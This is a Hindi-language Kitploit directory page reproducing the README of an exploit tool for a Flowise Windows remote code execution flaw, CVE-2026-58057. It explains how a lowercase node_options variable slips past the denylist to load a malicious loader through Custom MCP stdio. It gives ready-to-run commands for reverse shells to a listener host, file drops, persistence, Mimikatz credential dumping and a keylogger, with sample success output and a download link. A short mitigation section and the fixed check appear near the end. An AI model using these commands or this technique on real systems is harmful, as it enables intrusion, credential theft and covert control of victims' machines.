Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE एक्सप्लॉइट CVE-2026-58057 के लिए। केस-सेंसिटिव खामी के माध्यम से एनवायरनमेंट वेरिएबल सत्यापन को बायपास करता है। MCP stdio के माध्यम से मनमाना कोड इंजेक्ट करने के लिए node_options का उपयोग करता है। रिवर्स शेल, पर्सिस्टेंस, फ़ाइल अपलोड, क्रेडेंशियल डंपिंग का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
स्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

पेलोड डेवलपमेंट
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

रिपॉजिटरी देखें
128 दिन पहलेअभी तक समीक्षित नहीं

Flowise Windows RCE एक्सप्लॉइट CVE-2026-58057 के लिए। केस-सेंसिटिव खामी के माध्यम से एनवायरनमेंट वेरिएबल सत्यापन को बायपास करता है। MCP stdio के माध्यम से मनमाना कोड इंजेक्ट करने के लिए node_options का उपयोग करता है। रिवर्स शेल, पर्सिस्टेंस, फ़ाइल अपलोड, क्रेडेंशियल डंपिंग का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

Flowise CVE-2026-58057 - Windows रिमोट कोड एक्ज़ीक्यूशन एक्सप्लॉइट

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 अवलोकन

यह CVE-2026-58057 के लिए एक प्रोडक्शन-ग्रेड एक्सप्लॉइट है, जो Windows प्लेटफ़ॉर्म पर Flowise में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। यह भेद्यता केस-सेंसिटिव एन्वायरनमेंट वेरिएबल वैलिडेशन के कारण उत्पन्न होती है, जो लोअरकेस node_options को ब्लॉक करने में विफल रहता है, जिससे हमलावर NODE_OPTIONS डेनीलिस्ट को बायपास कर सकते हैं और Custom MCP stdio कॉन्फ़िगरेशन के माध्यम से मनमाना कोड निष्पादित कर सकते हैं।

यह एक्सप्लॉइट मॉड्यूलर आर्किटेक्चर, व्यापक त्रुटि प्रबंधन और कई पेलोड प्रकारों के समर्थन के साथ पेशेवर सॉफ्टवेयर इंजीनियरिंग प्रथाओं को प्रदर्शित करता है।

f1

f2

⚠️ अस्वीकरण

महत्वपूर्ण: यह टूल केवल अधिकृत सुरक्षा परीक्षण, पेनेट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

🔍 तकनीकी विवरण

भेद्यता का मूल कारण

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

एक्सप्लॉइट तंत्र

  1. हमलावर Flowise में प्रमाणीकरण करता है

  2. Custom MCP stdio नोड बनाता/संशोधित करता है

  3. लोअरकेस node_options एन्वायरनमेंट वेरिएबल इंजेक्ट करता है

  4. वैल्यू को --require malicious-loader.js पर सेट करता है

  5. जब MCP stdio चलता है तो Node.js लोडर को निष्पादित करता है

  6. मनमाना कोड निष्पादन प्राप्त होता है

✨ विशेषताएँ

मुख्य क्षमताएँ

  • ✅ Reverse Shell - हमलावर मशीन से वापस कनेक्ट करें

  • ✅ Bind Shell - टारगेट पर लिसनिंग पोर्ट खोलें

  • ✅ Command Execution - मनमाना सिस्टम कमांड चलाएँ

  • ✅ File Upload - टारगेट सिस्टम पर फ़ाइलें अपलोड करें

  • ✅ Persistence - कई पर्सिस्टेंस तंत्र

  • ✅ Information Gathering - सिस्टम खुफिया जानकारी एकत्र करें

  • ✅ Credential Dumping - Mimikatz एकीकरण

  • ✅ Screenshot Capture - डेस्कटॉप स्क्रीनशॉट कैप्चर करें

  • ✅ Keylogger - कीलॉगिंग क्षमता स्थापित करें

तकनीकी विशेषताएँ

  • 🔐 एकाधिक प्रमाणीकरण विधियाँ - API key या उपयोगकर्ता नाम/पासवर्ड

  • 🔄 ऑटो-रिट्री लॉजिक - नेटवर्क समस्याओं के प्रति लचीला

  • 🧹 सेल्फ-क्लीनिंग - टारगेट से लोडर फ़ाइलें हटाता है

  • 🌐 क्रॉस-प्लेटफ़ॉर्म - Windows/Linux/macOS पर काम करता है

  • 🎨 रंगीन आउटपुट - बेहतर पठनीयता

  • 📊 वर्बोज़ डिबगिंग - समस्या निवारण के लिए विस्तृत लॉगिंग

📦 इंस्टॉलेशन

आवश्यक शर्तें

  • Python 3.6 या उच्चतर

  • pip (पायथन पैकेज मैनेजर)

त्वरित इंस्टॉलेशन

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Docker इंस्टॉलेशन (वैकल्पिक )

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 उपयोग

कमांड लाइन विकल्प

root@kitploit:~
python3 exploit.py --help

प्रमाणीकरण विकल्प

पेलोड विकल्प

निष्पादन विकल्प

विकल्पविवरण
--interactiveइंटरैक्टिव शेल प्रारंभ करें
--verboseडिबग आउटपुट सक्षम करें
--timeout

📝 उपयोग उदाहरण

1. बेसिक रिवर्स शेल

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. इंटरैक्टिव रिवर्स शेल

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. कमांड निष्पादन

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. फ़ाइल अपलोड

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. क्रेडेंशियल डंपिंग (Mimikatz )

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. पर्सिस्टेंस इंस्टॉलेशन

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. सूचना संग्रह

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. स्क्रीनशॉट कैप्चर

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 पेलोड प्रकार

🛡️ शमन

Flowise अपग्रेड करें

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

वर्कअराउंड

  • Custom MCP कॉन्फ़िगरेशन तक पहुंच प्रतिबंधित करें

  • नेटवर्क सेगमेंटेशन लागू करें

  • संदिग्ध एन्वायरनमेंट वेरिएबल्स की निगरानी करें

  • वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें

सही किया गया कोड

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 आउटपुट उदाहरण

सफल एक्सप्लॉइट

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

वर्बोज़ मोड

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 समस्या निवारण

सामान्य समस्याएँ

डिबग कमांड

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 फ़ाइल संरचना

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 योगदान

  1. रिपॉजिटरी को फोर्क करें

  2. फीचर ब्रांच बनाएं (git checkout -b feature/amazing)

  3. परिवर्तन कमिट करें (git commit -m 'Add amazing feature')

  4. ब्रांच पर पुश करें (git push origin feature/amazing)

  5. पुल अनुरोध खोलें

📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🏆 आभार

  • FlowiseAI को उत्पाद के लिए

  • समान भेद्यताओं की खोज करने वाले सुरक्षा शोधकर्ता

  • परीक्षण पद्धतियों के लिए पेनेट्रेशन टेस्टिंग समुदाय

🔗 संदर्भ

  • CVE-2026-58057

  • Flowise GitHub रिपॉजिटरी

  • Flowise दस्तावेज़ीकरण

  • Node.js एन्वायरनमेंट वेरिएबल्स सुरक्षा

📧 संपर्क

लेखक: Sudeepa Wanigarathna सुरक्षा शोधकर्ता और पेनेट्रेशन परीक्षक

⭐ समर्थन

यदि आपको यह टूल उपयोगी लगे, तो कृपया विचार करें:

  • ⭐ GitHub पर रिपॉजिटरी को स्टार करें

  • 🔔 अपडेट के लिए फॉलो करें

  • 📝 समस्याओं या सुझावों की रिपोर्ट करें


सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

टूल डाउनलोड करें
विकल्पविवरणउदाहरण
-t, --targetFlowise URL (आवश्यक)http://localhost:3000
-k, --api-keyFlowise API कुंजीflowise_abc123...
-u, --usernameउपयोगकर्ता नामadmin
-p, --passwordपासवर्डpassword123
विकल्पविवरणउदाहरण
--payloadपेलोड प्रकारreverse_shell
--lhostलिसनर होस्ट192.168.1.100
--lportलिसनर पोर्ट4444
--commandनिष्पादित करने के लिए कमांडwhoami
--local-fileअपलोड करने के लिए फ़ाइलpayload.exe
--remote-pathदूरस्थ सहेजने का पथC:\\Temp\\update.exe
अनुरोध टाइमआउट सेकंड में
--retriesपुनः प्रयासों की संख्या
पेलोडविवरणतर्क
reverse_shellलिसनर से वापस कनेक्ट करें--lhost, --lport
bind_shellलिसनिंग पोर्ट खोलें--lport
command_execकमांड निष्पादित करें--command
file_uploadटारगेट पर फ़ाइल अपलोड करें--local-file, --remote-path
persistenceपर्सिस्टेंस स्थापित करेंकोई नहीं
info_gatherसिस्टम जानकारी एकत्र करेंकोई नहीं
mimikatzक्रेडेंशियल डंप करेंकोई नहीं
screenshotस्क्रीनशॉट कैप्चर करेंकोई नहीं
keyloggerकीलॉगर स्थापित करेंकोई नहीं
समस्यासमाधान
SSL प्रमाणपत्र त्रुटिpip install --trusted-host pypi.org -r requirements.txt
अनुमति अस्वीकृतpip install --user -r requirements.txt
कनेक्शन अस्वीकृतटारगेट URL और नेटवर्क कनेक्टिविटी सत्यापित करें
प्रमाणीकरण विफलAPI कुंजी या उपयोगकर्ता नाम/पासवर्ड जांचें
पेलोड विफलविस्तृत डिबगिंग के लिए --verbose का उपयोग करें
Python संस्करणसुनिश्चित करें कि Python 3.6+ स्थापित है